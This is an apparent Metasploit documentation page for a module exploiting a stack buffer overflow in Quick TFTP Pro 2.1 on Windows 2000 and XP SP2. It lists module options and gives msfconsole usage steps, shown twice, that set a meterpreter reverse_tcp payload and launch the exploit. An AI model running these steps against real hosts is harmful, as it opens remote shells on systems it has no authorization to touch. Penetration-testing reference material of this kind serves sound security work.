Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
Quick FTP Pro 2.1 Transfer-Mode Overflow
This module exploits a stack buffer overflow in the Quick TFTP Pro server product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting in a DoS. This is a port of a sploit by Mati "muts" Aharoni.
Rank
- Good
Authors
- Saint Patrick < >
References
Exploit Targets
- 0 - Windows Server 2000
- 1 - Windows XP SP2 (default)
Development
Similar Modules
- exploit/windows/tftp/attftp_long_filename
- exploit/windows/tftp/dlink_long_filename
- exploit/windows/tftp/futuresoft_transfermode
- exploit/windows/tftp/opentftp_error_code
- exploit/windows/tftp/tftpd32_long_filename
- exploit/windows/tftp/tftpdwin_long_filename
- exploit/windows/tftp/threectftpsvc_long_mode
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/tftp/quick_tftp_pro_mode
msf exploit(quick_tftp_pro_mode) > show payloads
msf exploit(quick_tftp_pro_mode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(quick_tftp_pro_mode) > set LHOST [MY IP ADDRESS]
msf exploit(quick_tftp_pro_mode) > set RHOST [TARGET IP]
msf exploit(quick_tftp_pro_mode) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/tftp/quick_tftp_pro_mode
msf exploit(quick_tftp_pro_mode) > show payloads
msf exploit(quick_tftp_pro_mode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(quick_tftp_pro_mode) > set LHOST [MY IP ADDRESS]
msf exploit(quick_tftp_pro_mode) > set RHOST [TARGET IP]
msf exploit(quick_tftp_pro_mode) > exploit
Module Options
| RHOST | The target address |
| RPORT | The target port (default: 69) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
